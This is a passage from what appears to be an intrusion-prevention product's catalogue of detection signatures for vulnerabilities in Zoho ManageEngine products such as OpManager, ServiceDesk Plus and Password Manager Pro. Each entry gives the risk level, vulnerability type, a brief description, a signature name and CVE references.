Platform: Generic
Software: Zoho Corporation ManageEngine ServiceDesk
Type: Input Validation
Description: Improper validation of parameters related to file uploads allows an attacker to upload arbitrary files on the target system, allowing arbitrary code to be executed with system privileges.
Situation: HTTP_CS-Zoho-Manageengine-Multiple-Products-Importtechniciansaction-Arbitrary-File-Upload
References:
CVE-2021-44077
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44077
Back to top

Zoho-Manageengine-Multiple-Products-Invokedatauploadtool-Command-Injection

About this vulnerability: A vulnerability in Zoho Corporation ManageEngine ServiceDesk Plus
Risk: High
First detected in: sgpkg-ips-1542-5242
Last changed: sgpkg-ips-1542-5242
Platform: Generic
Software: Zoho Corporation ManageEngine ServiceDesk; Zoho Corporation ManageEngine SupportCenter
Type: Input Validation
Description: A command injection vulnerability has been reported in Zoho ManageEngine ServiceDesk Plus and SupportCenter Plus. The vulnerability is due to improper input validation when handling requests. A remote, authenticated attacker can exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could allow arbitrary command executions.
Situation: HTTP_CRL-Zoho-Manageengine-Multiple-Products-Invokedatauploadtool-Command-Injection
References:
CVE-2022-40770
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40770
Back to top

Zoho-Manageengine-Multiple-Products-URL-Monitoring-SQL-Injection

About this vulnerability: A vulnerability in Zoho Corporation ManageEngine OpManager
Risk: Moderate
First detected in: sgpkg-ips-1792-5242
Last changed: sgpkg-ips-1792-5242
Platform: Generic
Software: Zoho Corporation ManageEngine OpManager
Type: Input Validation
Description: Improper validation of user input used in the URL Monitoring component causes an SQL injection vulnerability in Zoho ManageEngine. A successful exploitation allows an attacker to execute arbitrary SQL on the target system.
Situation: HTTP_CS-Zoho-Manageengine-Multiple-Products-URL-Monitoring-SQL-Injection
References:
CVE-2024-6748
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-6748
Back to top

Zoho-Manageengine-NetFlow-Analyzer-Reportapihandler-Comparereport-SQL-Injection

About this vulnerability: A vulnerability in Zoho Corporation ManageEngine Netflow Analyzer
Risk: Moderate
First detected in: sgpkg-ips-1172-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Zoho Corporation ManageEngine Netflow Analyzer
Type: Input Validation
Description: An SQL injection vulnerability exists in ManageEngine NetFlow Analyzer. This vulnerability is due to insufficient validation of the DeviceID parameter when processing requests sent to ReportApiHandler. A remote, authenticated attacker could exploit this vulnerability by sending a web request with a malicious SQL query to the target server. Successful exploitation could result in arbitrary SQL code execution in the security context of the SYSTEM.
Situation: HTTP_CRL-Zoho-Manageengine-NetFlow-Analyzer-Reportapihandler-Comparereport-SQL-Injection
References:
CVE-2019-12196
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12196
Back to top

Zoho-Manageengine-Network-Configuration-Manager-CVE-2021-41081-SQL-Injection

About this vulnerability: A vulnerability in Zoho Corporation ManageEngine Network Configuration Manager
Risk: Moderate
First detected in: sgpkg-ips-1412-5242
Last changed: sgpkg-ips-1412-5242
Platform: Generic
Software: Zoho Corporation ManageEngine Network Configuration Manager
Type: Input Validation
Description: Insufficient validation of the parameters in the configuration search operation allows an attacker to execute arbitrary SQL on the target system.
Situation: HTTP_CS-Zoho-Manageengine-Network-Configuration-Manager-CVE-2021-41081-SQL-Injection
References:
CVE-2021-41081
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41081
Back to top

Zoho-Manageengine-Network-Configuration-Manager-Ping-Command-Injection

About this vulnerability: A vulnerability in ManageEngine Network Configuration Manager
Risk: Moderate
First detected in: sgpkg-ips-1424-5242
Last changed: sgpkg-ips-1424-5242
Platform: Generic
Software: Zoho Corporation ManageEngine Network Configuration Manager
Type: Input Validation
Description: Insufficient validation of the ipaddress field of the ping functionality in ManageEngine Network Manager causes a command injection vulnerability which can be exploited to execute arbitrary code on the target system.
Situation: HTTP_CSU-Zoho-Manageengine-Network-Configuration-Manager-Ping-Command-Injection
References:
CVE-2021-43319
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43319
Back to top

Zoho-Manageengine-Opmanager-Alarms-Section-SQL-Injection

About this vulnerability: A vulnerability in Zoho ManageEngine OpManager
Risk: Moderate
First detected in: sgpkg-ips-1137-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Zoho Corporation ManageEngine OpManager
Type: SQL Injection
Description: An SQL injection vulnerability in Zoho ManageEngine OpManager, versions prior to 12.3 Build 123239, due to insufficient validation of the parameters in the HTTP requests regarding listAlarms API.
Situation: HTTP_CRL-Zoho-Manageengine-Opmanager-Alarms-Section-SQL-Injection
References:
CVE-2018-20338
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20338
Back to top

Zoho-Manageengine-Opmanager-Apidbutil-Getdevicesforsearchstring-SQL-Injection

About this vulnerability: A vulnerability in Zoho Corporation ManageEngine OpManager
Risk: Moderate
First detected in: sgpkg-ips-1110-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Zoho Corporation ManageEngine OpManager
Type: Input Validation
Description: Insufficient validation of the searchString parameter of HTTP requests causes an SQL injection vulnerability in Zoho ManageEngine. A successful exploit may allow an attacker to execute arbitrary code on the target system.
Situation: HTTP_CRL-Zoho-Manageengine-Opmanager-Apidbutil-Getdevicesforsearchstring-SQL-Injection
References:
CVE-2018-17243
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17243
Back to top

Zoho-Manageengine-Opmanager-Business-View-Background-Image-Arbitrary-File-Upload

About this vulnerability: A vulnerability in Zoho Corporation ManageEngine OpManager
Risk: Moderate
First detected in: sgpkg-ips-1116-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Zoho Corporation ManageEngine OpManager
Type: Input Validation
Description: Insufficient validation of uploads causes an arbitrary file upload vulnerability in Zoho ManageEngine. A successful exploit allows an attacker to upload files to the target system and use them for further exploitation.
Situation: HTTP_CS-Zoho-Manageengine-Opmanager-Business-View-Background-Image-Arbitrary-File-Upload
References:
CVE-2018-18475
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18475
Back to top

Zoho-Manageengine-Opmanager-BusinessViewFlashImpl-Xxe

About this vulnerability: An attempt to exploit a vulnerability in Zoho ManageEngine OpManager detected
Risk: High
First detected in: sgpkg-ips-1440-5242
Last changed: sgpkg-ips-1440-5242
Platform: Generic
Software: ManageEngine OpManager
Type: Input Validation
Description: An attempt to exploit an XXE information disclosure vulnerability in Zoho ManageEngine OpManager detected.
Situation: HTTP_CRL-Zoho-Manageengine-Opmanager-BusinessViewFlashImpl-Xxe
References:
CVE-2018-18980
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18980
Back to top

Zoho-Manageengine-Opmanager-Cachestart-Directory-Traversal

About this vulnerability: A vulnerability in Zoho Corporation ManageEngine OpManager
Risk: Moderate
First detected in: sgpkg-ips-1258-5242
Last changed: sgpkg-ips-1641-5242
Platform: Generic
Software: Zoho Corporation ManageEngine OpManager
Type: Directory Traversal
Description: There exists a directory traversal vulnerability in ManageEngine OpManager. Successful exploitation could lead in arbitrary file read on the target server.
Situation: HTTP_CSU-Zoho-Manageengine-Opmanager-Fluidicv2-UI-Directory-Traversal
References:
CVE-2020-13818
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13818
Back to top

Zoho-Manageengine-Opmanager-CVE-2022-29535-SQL-Injection

About this vulnerability: A vulnerability in ManageEngine OpManager.
Risk: High
First detected in: sgpkg-ips-1469-5242
Last changed: sgpkg-ips-1469-5242
Platform: Windows
Software: ManageEngine OpManager
Type: SQL Injection
Description: A vulnerability in ManageEngine OpManager, versions 12.5 Build 125617 and below, which allows remote attackers to execute arbitrary SQL commands by sending a web request with a malicious SQL query to the target server, due to insufficient validation of the parameters in the HTTP requests when processing default reports.
Situation: HTTP_CSU-Zoho-Manageengine-Opmanager-CVE-2022-29535-SQL-Injection
References:
CVE-2022-29535
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29535
Back to top

Zoho-Manageengine-Opmanager-Datamigrationservlet-Insecure-Deserialization

About this vulnerability: A vulnerability in Zoho Corporation ManageEngine OpManager
Risk: Moderate
First detected in: sgpkg-ips-1125-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Zoho Corporation ManageEngine OpManager
Type: Input Validation
Description: Insecure deserialization of untrusted data by the DataMigrationServlet causes a vulnerability in Zoho ManageEngine. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: File-Binary_Zoho-Manageengine-Opmanager-Datamigrationservlet-Insecure-Deserialization
References:
CVE-2018-19403
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19403
Back to top

Zoho-Manageengine-Opmanager-Failoverhelperservlet-Cross-Site-Scripting

About this vulnerability: A vulnerability in Zoho Corporation ManageEngine OpManager
Risk: Moderate
First detected in: sgpkg-ips-1104-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Zoho Corporation ManageEngine OpManager
Type: Input Validation
Description: There has been reported reflected cross-site scripting vulnerability in Zoho ManageEngine OpManager. A remote attacker could exploit this vulnerability by enticing a user into clicking a crafted link. Successful exploitation can lead to execution of javascript code in the target user's browser.
Situation: HTTP_CSU-Zoho-Manageengine-Opmanager-Failoverhelperservlet-Cross-Site-Scripting
References:
CVE-2018-12998
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12998
Back to top

Zoho-Manageengine-Opmanager-Fluidicv2-UI-Directory-Traversal

About this vulnerability: A vulnerability in Zoho Corporation ManageEngine OpManager
Risk: Moderate
First detected in: sgpkg-ips-1253-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Zoho Corporation ManageEngine OpManager
Type: Directory Traversal
Description: There exists a directory traversal vulnerability in ManageEngine OpManager. Successful exploitation could lead in arbitrary file read on the target server.
Situation: HTTP_CSU-Zoho-Manageengine-Opmanager-Fluidicv2-UI-Directory-Traversal
References:
CVE-2020-12116
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12116
Back to top

Zoho-Manageengine-Opmanager-Getdatacollectionfailurereason-SQL-Injection

About this vulnerability: A vulnerability in Zoho Corporation ManageEngine OpManager
Risk: Moderate
First detected in: sgpkg-ips-1392-5242
Last changed: sgpkg-ips-1392-5242
Platform: Generic
Software: Zoho Corporation ManageEngine OpManager
Type: Input Validation
Description: There exists an SQL injection vulnerability in ManageEngine OpManager. Successful exploitation could lead in arbitrary SQL code execution.
Situation: HTTP_CSU-Zoho-Manageengine-Opmanager-Getdatacollectionfailurereason-SQL-Injection
References:
CVE-2021-40493
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40493
Back to top

Zoho-Manageengine-Opmanager-Getgraphdata-SQL-Injection

About this vulnerability: A vulnerability in Zoho Corporation ManageEngine OpManager
Risk: Moderate
First detected in: sgpkg-ips-1123-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Zoho Corporation ManageEngine OpManager
Type: Input Validation
Description: There has been reported a SQL injection vulnerability in ManageEngine OpManager. This vulnerability could be exploited by a remote, authenticated attacker. Successful exploitation could lead to arbitrary SQL code execution.
Situation: HTTP_CSU-Zoho-Manageengine-Opmanager-Getgraphdata-SQL-Injection
References:
CVE-2018-20173
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20173
Back to top

Zoho-Manageengine-Opmanager-Getobjectdata-Insecure-Deserialization

About this vulnerability: A vulnerability in Zoho Corporation ManageEngine OpManager
Risk: High
First detected in: sgpkg-ips-1596-5242
Last changed: sgpkg-ips-1596-5242
Platform: Generic
Software: Zoho Corporation ManageEngine OpManager
Type: Input Validation
Description: A remote code execution vulnerability has been reported in Zoho ManageEngine OpManager. The vulnerability is due to improper validation of user submitted serialized objects in the servlet handling communication between central and probe servers. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in arbitrary code execution under the security context of SYSTEM.
Situation: File-Binary_Zoho-Manageengine-Opmanager-Getobjectdata-Insecure-Deserialization
References:
CVE-2023-31099
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-31099
Back to top

Zoho-Manageengine-Opmanager-Getreportdata-SQL-Injection

About this vulnerability: A vulnerability in Zoho Corporation ManageEngine OpManager
Risk: High
First detected in: sgpkg-ips-1394-5242
Last changed: sgpkg-ips-1394-5242
Platform: Generic
Software: Zoho Corporation ManageEngine OpManager
Type: Input Validation
Description: A SQL injection vulnerability exists in ManageEngine OpManager. This vulnerability is due to insufficient validation of the parameters in the HTTP requests processed by the getReportData method. A remote, authenticated attacker could exploit this vulnerability by sending a web request with a malicious SQL query to the target server. Successful exploitation could lead to arbitrary SQL code execution in the security context of database service.
Situation: HTTP_CRL-Zoho-Manageengine-Opmanager-Getreportdata-SQL-Injection
References:
CVE-2021-41288
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41288
Back to top

Zoho-Manageengine-Opmanager-Inventory-Reports-SQL-Injection

About this vulnerability: A vulnerability in ManageEngine OpManager.
Risk: High
First detected in: sgpkg-ips-1460-5242
Last changed: sgpkg-ips-1460-5242
Platform: Windows
Software: ManageEngine OpManager
Type: SQL Injection
Description: A vulnerability in ManageEngine OpManager, versions prior to 12.5 Build 125588 and 125603, which allows remote attackers to exectute arbitrary SQL commands by sending a web request with a malicious SQL query to the target server, due to insufficient validation of the parameters in the HTTP requests processed by the Inventory Reports module.
Situation: HTTP_CSU-Zoho-Manageengine-Opmanager-Inventory-Reports-SQL-Injection
References:
CVE-2022-27908
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27908
Back to top

Zoho-Manageengine-Opmanager-Opmanagerfailoverutil-Customername-SQL-Injection

About this vulnerability: A vulnerability in Zoho Corporation ManageEngine OpManager
Risk: Moderate
First detected in: sgpkg-ips-1117-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Zoho Corporation ManageEngine OpManager
Type: Input Validation
Description: Improper validation of the customerName parameter in a request causes an SQL injection vulnerability in Zoho ManageEngine OpManager. A successful exploit allows an attacker to execute arbitrary code with the privileges of the database.
Situation: HTTP_CRL-Zoho-Manageengine-Opmanager-Opmanagerfailoverutil-Customername-SQL-Injection
References:
CVE-2018-9088
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9088
Back to top

Zoho-Manageengine-Opmanager-Opmdevicedetailsservlet-Category-SQL-Injection

About this vulnerability: A vulnerability in Zoho Corporation ManageEngine OpManager
Risk: Moderate
First detected in: sgpkg-ips-1200-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Zoho Corporation ManageEngine OpManager
Type: Input Validation
Description: There exists a remotely exploitable SQL injection vulnerability in ManageEngine OpManager. Successful exploitation could lead in arbitrary code execution.
Situation: HTTP_CSU-Zoho-Manageengine-Opmanager-Opmdevicedetailsservlet-Category-SQL-Injection
References:
CVE-2019-17602
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17602
Back to top

Zoho-Manageengine-Opmanager-Oputilsservlet-Authentication-Bypass

About this vulnerability: A vulnerability in Zoho Corporation ManageEngine OpManager
Risk: Moderate
First detected in: sgpkg-ips-1110-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Zoho Corporation ManageEngine OpManager
Type: Malfunction
Description: There has been reported an authentication bypass vulnerability in ManageEngine OpManager. A remote attacker can exploit this vulnerability by sending a crafted request to the target server. Successful exploitation leads in authentication bypass.
Situation: HTTP_CRL-Zoho-Manageengine-Opmanager-Oputilsservlet-Authentication-Bypass
References:
CVE-2018-17283
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17283
Back to top

Zoho-Manageengine-Opmanager-Relationalmailserver-SQL-Injection

About this vulnerability: A vulnerability in Zoho Corporation ManageEngine OpManager
Risk: Moderate
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ManageEngine OpManager
Type: Input Validation
Description: There has been reported an SQL injection vulnerability in ManageEngine OpManager. Due to insufficient validation, a remote attacker could exploit this by sending a malicious request to the target server and gain arbitrary code execution on the server.
Situation: HTTP_CRL-Zoho-Manageengine-Opmanager-Relationalmailserver-SQL-Injection
References:
CVE-2018-18949
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18949
Back to top

Zoho-Manageengine-Opmanager-Setmanaged-SQL-Injection

About this vulnerability: A vulnerability in Zoho Corporation ManageEngine OpManager
Risk: Moderate
First detected in: sgpkg-ips-1110-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Zoho Corporation ManageEngine OpManager
Type: Input Validation
Description: Insufficient validation of the searchString parameter of HTTP requests causes an SQL injection vulnerability in Zoho ManageEngine. A successful exploit may allow an attacker to execute arbitrary code on the target system.
Situation: HTTP_CRL-Zoho-Manageengine-Opmanager-Setmanaged-SQL-Injection
References:
CVE-2018-17283
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17283
Back to top

Zoho-Manageengine-Opmanager-SumPDU-Java-Deserialization

About this vulnerability: A vulnerability in Zoho Corporation ManageEngine OpManager.
Risk: High
First detected in: sgpkg-ips-1400-5242
Last changed: sgpkg-ips-1400-5242
Platform: Windows; Unix; Linux
Software: Zoho Corporation ManageEngine OpManager
Type: Input Validation
Description: A vulnerability in Zoho Corporation ManageEngine OpManager, versions 12.1 through 12.5.328, which allows remote attackesr to execute arbitrary commands via the Smart Update Manager (SUM) servlet CVE-2020-28653, due to a general bypass in the deserialization class CVE-2021-3287.
Situation: File-Binary_Zoho-Manageengine-Opmanager-SumPDU-Java-Deserialization
References:
CVE-2020-28653
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28653
Back to top

Zoho-Manageengine-Opmanagerdbutil-Getprobenatdetails-SQL-Injection

About this vulnerability: A vulnerability in Zoho Corporation ManageEngine OpManager
Risk: Moderate
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Zoho Corporation ManageEngine OpManager
Type: Input Validation
Description: Insufficient validation of the probeName and serverRole parameters in the Java class OpManagerDBUtil causes an SQL injection vulnerability in Zoho ManageEngine. A successful exploit allows an attacker to run arbitrary code with the privileges of the database.
Situation: HTTP_CSU-Zoho-Manageengine-Opmanagerdbutil-Getprobenatdetails-SQL-Injection
References:
CVE-2018-9087
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9087
Back to top

Zoho-Manageengine-Password-Manager-Pro-Autologonhelperutil-SQL-Injection

About this vulnerability: A vulnerability in Zoho Corporation ManageEngine Access Manager Plus
Risk: Moderate
First detected in: sgpkg-ips-1529-5242
Last changed: sgpkg-ips-1529-5242
Platform: Generic
Software: Zoho Corporation ManageEngine Access Manager Plus; Zoho Corporation ManageEngine PAM360; Zoho Corporation ManageEngine Password Manager Pro
Type: Input Validation
Description: Improper validation of resource types in the AutoLogonHelperUtil class causes an SQL injection vulnerability in various Zoho Products. A successful exploit allows an attacker to execute arbitrary SQL on a database that runs with system privileges.
Situation: HTTP_CS-Zoho-Manageengine-Password-Manager-Pro-Autologonhelperutil-SQL-Injection
References:
CVE-2022-40300
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40300
Back to top

Zoho-Manageengine-Password-Manager-Pro-Dashboardtablecontroller-SQL-Injection

About this vulnerability: A vulnerability in Zoho Corporation ManageEngine Password Manager Pro
Risk: Moderate
First detected in: sgpkg-ips-1510-5242
Last changed: sgpkg-ips-1518-5242
Platform: Generic
Software: Zoho Corporation ManageEngine Password Manager Pro; Zoho Corporation ManageEngine Access Manager Plus; Zoho Corporation ManageEngine PAM360
Type: Input Validation
Description: Improper validation of user input parameters in DashBoardTableController class causes an SQL injection vulnerability in Zoho ManageEngine. A successful exploit allows an attacker to execute arbitrary SQL on the target system.
Situation: HTTP_CSU-Zoho-Manageengine-Password-Manager-Pro-GetVaraibleController-SQL-Injection
HTTP_CRL-Zoho-Manageengine-Password-Manager-Pro-Dashboardtablecontroller-SQL-Injection
References:
CVE-2022-40300
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40300
Back to top

Zoho-Manageengine-Password-Manager-Pro-Landingserverfilter-SQL-Injection

About this vulnerability: A vulnerability in Zoho Corporation ManageEngine Access Manager Plus
Risk: High
First detected in: sgpkg-ips-1542-5242
Last changed: sgpkg-ips-1542-5242
Platform: Generic
Software: Zoho Corporation ManageEngine Access Manager Plus; Zoho Corporation ManageEngine PAM360; Zoho Corporation ManageEngine Password Manager Pro
Type: Input Validation
Description: An SQL injection vulnerability has been reported in Zoho ManageEngine Password Manager Pro and related products. The vulnerability is due to improper validation of resource DNS name in the LandingServerFilter class. A remote attacker can exploit the vulnerability by sending a crafted request to the target server. Successful exploitation could lead to arbitrary SQL code execution in the security context of database service.
Situation: HTTP_CRL-Zoho-Manageengine-Password-Manager-Pro-Landingserverfilter-SQL-Injection
References:
CVE-2022-43671
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-43671
Back to top

Zoho-Manageengine-Password-Manager-Pro-Queryreportcontroller-SQL-Injection

About this vulnerability: A vulnerability in Zoho Corporation ManageEngine Access Manager Plus
Risk: Moderate
First detected in: sgpkg-ips-1525-5242
Last changed: sgpkg-ips-1525-5242
Platform: Generic
Software: Zoho Corporation ManageEngine Access Manager Plus; Zoho Corporation ManageEngine PAM360; Zoho Corporation ManageEngine Password Manager Pro
Type: Input Validation
Description: Improper validation of login username in the QueryReportController class causes an SQL injection vulnerability in Zoho ManageEngine. A successful exploit allows an attacker to execute arbitrary SQL on the target system.
Situation: HTTP_CS-Zoho-Manageengine-Password-Manager-Pro-Queryreportcontroller-SQL-Injection
References:
CVE-2022-40300
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40300
Back to top

Zoho-Manageengine-PWMgrPro-Usergrouplisttablecontroller-SQL-Injection

About this vulnerability: A vulnerability in Zoho Corporation ManageEngine Access Manager Plus
Risk: Moderate
First detected in: sgpkg-ips-1552-5242
Last changed: sgpkg-ips-1552-5242
Platform: Generic
Software: Zoho Corporation ManageEngine Access Manager Plus; Zoho Corporation ManageEngine PAM360; Zoho Corporation ManageEngine Password Manager Pro
Type: Input Validation
Description: Improper validation of the actionType parameter in the UserGroupListTableController class causes an SQL injection vulnerability in Zoho ManageEngine. A successful exploit allows an attacker to execute arbitrary SQL on the target system.
Situation: HTTP_CRL-Zoho-Manageengine-Password-Manager-Pro-Usergrouplisttablecontroller-SQL-Injection
References:
CVE-2022-43672
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-43672
Back to top

Zoho-Manageengine-Recoverymanager-Plus-Updateproxysettings-Command-Injection

About this vulnerability: A vulnerability in Zoho Corporation ManageEngine RecoveryManager Plus
Risk: Moderate
First detected in: sgpkg-ips-1667-5242
Last changed: sgpkg-ips-1667-5242
Platform: Generic
Software: Zoho Corporation ManageEngine RecoveryManager Plus
Type: Input Validation
Description: Improper input validation in the updateProxySettings method causes a command injection vulnerability in Zoho ManageEngine RecoveryManager Plus. A successful exploitation allows an attacker to execute arbitrary commands on the target system.
Situation: HTTP_CRL-Zoho-Manageengine-Recoverymanager-Plus-Updateproxysettings-Command-Injection
References:
CVE-2023-48646
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-48646
Back to top

Zoho-Manageengine-Remote-Code-Execution-CVE-2022-35405

About this vulnerability: A vulnerability in Zoho ManageEngine
Risk: High
First detected in: sgpkg-ips-1490-5242
Last changed: sgpkg-ips-1490-5242
Platform: Generic
Software: Zoho ManageEngine Password Manager Pro
Type: Malfunction
Description: A deserialization vulnerability has been reported in Zoho ManageEngine Password Manager Pro. This vulnerability could be exploited remotely by an unauthenticated user via a maliciously crafted xmlrpc request. Successful exploitation could lead in arbitrary code execution.
Situation: File-TextId_Zoho-Manageengine-Remote-Code-Execution-CVE-2022-35405
References:
CVE-2022-35405
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35405
Back to top

Zoho-Manageengine-Remote-Code-Execution-CVE-2022-47966

About this vulnerability: A vulnerability in Zoho ManageEngine
Risk: High
First detected in: sgpkg-ips-1547-5242
Last changed: sgpkg-ips-1547-5242
Platform: Generic
Software: Zoho Corporation ManageEngine Access Manager Plus; Zoho Corporation ManageEngine ADAudit Plus; Zoho Corporation ManageEngine ADManager Plus
Type: Input Validation
Description: A remote code execution vulnerability has been reported in multiple Zoho ManageEngine products.
Situation: HTTP_CRL-Zoho-Manageengine-Remote-Code-Execution-CVE-2022-47966
References:
CVE-2022-47966
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-47966
Back to top

Zoho-Manageengine-Servicedesk-Plus-Custom-Schedules-Arbitrary-Command-Execution

About this vulnerability: A vulnerability in Zoho Corporation ServiceDesk Plus
Risk: High
First detected in: sgpkg-ips-1368-5242
Last changed: sgpkg-ips-1368-5242
Platform: Generic
Software: ManageEngine ServiceDesk Plus
Type: Input Validation
Description: An arbitrary command execution vulnerability has been reported in Zoho ManageEngine ServiceDesk Plus. The vulnerability is due to improper validation of user input command in custom-schedules module. A remote, authenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary command execution and possible remote code execution on the target server under the security context of SYSTEM.
Situation: File-Text_Zoho-Manageengine-Servicedesk-Plus-Custom-Schedules-Arbitrary-Command-Execution
References:
CVE-2021-20081
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20081
Back to top

Zoho-Manageengine-Servicedesk-Plus-CVE-2021-37415-Authentication-Bypass

About this vulnerability: A vulnerability in Zoho Corporation ServiceDesk Plus
Risk: Moderate
First detected in: sgpkg-ips-1418-5242
Last changed: sgpkg-ips-1418-5242
Platform: Generic
Software: Zoho Corporation ManageEngine ServiceDesk
Type: Malfunction
Description: Improper normalization of REST API URLs before applying security filtering causes a vulnerability in Zoho ManageEngine ServiceDesk Plus. A successful exploit allows an attacker to bypass authentication.
Situation: HTTP_CS-Zoho-Manageengine-Servicedesk-Plus-CVE-2021-37415-Authentication-Bypass
References:
CVE-2021-37415
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37415
Back to top

Zoho-Manageengine-Servicedesk-Plus-CVE-2021-46065-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in Zoho Corporation ManageEngine ServiceDesk Plus
Risk: Moderate
First detected in: sgpkg-ips-1433-5242
Last changed: sgpkg-ips-1433-5242
Platform: Generic
Software: Zoho Corporation ManageEngine ServiceDesk
Type: Input Validation
Description: Improper sanitization of the secondary email field parameter in some requests causes a cross-site scripting vulnerability in Zoho ManageEngine ServiceDesk Plus. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.
Situation: HTTP_CRL-Zoho-Manageengine-Servicedesk-Plus-CVE-2021-46065-Stored-Cross-Site-Scripting
References:
CVE-2021-46065
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46065
Back to top

Zoho-Manageengine-Servicedesk-Plus-Embed-Video-Link-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in Zoho Corporation ManageEngine ServiceDesk Plus
Risk: Moderate
First detected in: sgpkg-ips-1583-5242
Last changed: sgpkg-ips-1583-5242
Platform: Generic
Software: Zoho Corporation ManageEngine ServiceDesk
Type: Input Validation
Description: A stored cross-site scripting vulnerability has been reported in ServiceDesk Plus. The vulnerability is due to insufficient validation of data in embed video link when they are added in Product Tour page. A remote authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in arbitrary script execution under the security context of the target user's browser.
Situation: HTTP_CRL-Zoho-Manageengine-Servicedesk-Plus-Embed-Video-Link-Stored-Cross-Site-Scripting
References:
CVE-2023-23074
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23074
Back to top

Zoho-Manageengine-Servicedesk-Plus-File-Upload-CVE-2019-8394

About this vulnerability: A vulnerability in Zoho ManageEngine
Risk: High
First detected in: sgpkg-ips-1308-5242
Last changed: sgpkg-ips-1308-5242
Platform: Generic
Software: ManageEngine ServiceDesk Plus
Type: Insecure Configuration
Description: Zoho ManageEngine versions 9.4 and 10.0 before 10.0 build 10012 allow upload of arbitrary files via the CustomLogin module in FileAttachment.jsp.
Situation: HTTP_CRL-Zoho-Manageengine-Servicedesk-Plus-File-Upload-CVE-2019-8394
References:
CVE-2019-8394
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8394
Back to top

Zoho-Manageengine-Servicedesk-Plus-Releases-Status-Comments-XSS

About this vulnerability: A vulnerability in Zoho Corporation ManageEngine ServiceDesk Plus
Risk: Moderate
First detected in: sgpkg-ips-1578-5242
Last changed: sgpkg-ips-1578-5242
Platform: Generic
Software: Zoho Corporation ManageEngine ServiceDesk
Type: Input Validation
Description: Insufficient validation of data in status comments when they are added in Releases page causes a cross-site scripting vulnerability in Zoho ManageEngine. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.
Situation: HTTP_CRL-Zoho-Manageengine-Servicedesk-Plus-Releases-Status-Comments-Stored-Cross-Site-Scripting
References:
CVE-2023-23077
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23077
Back to top

Zoho-Manageengine-Servicedesk-Plus-Remote-Code-Execution-CVE-2021-44077

About this vulnerability: An attempt to exploit a vulnerability in Zoho ManageEngine ServiceDesk Plus detected
Risk: High
First detected in: sgpkg-ips-1411-5242
Last changed: sgpkg-ips-1436-5242
Platform: Generic
Software: Zoho Corporation ManageEngine ServiceDesk
Type: Malfunction
Description: An attempt to exploit a vulnerability in Zoho ManageEngine ServiceDesk Plus detected.
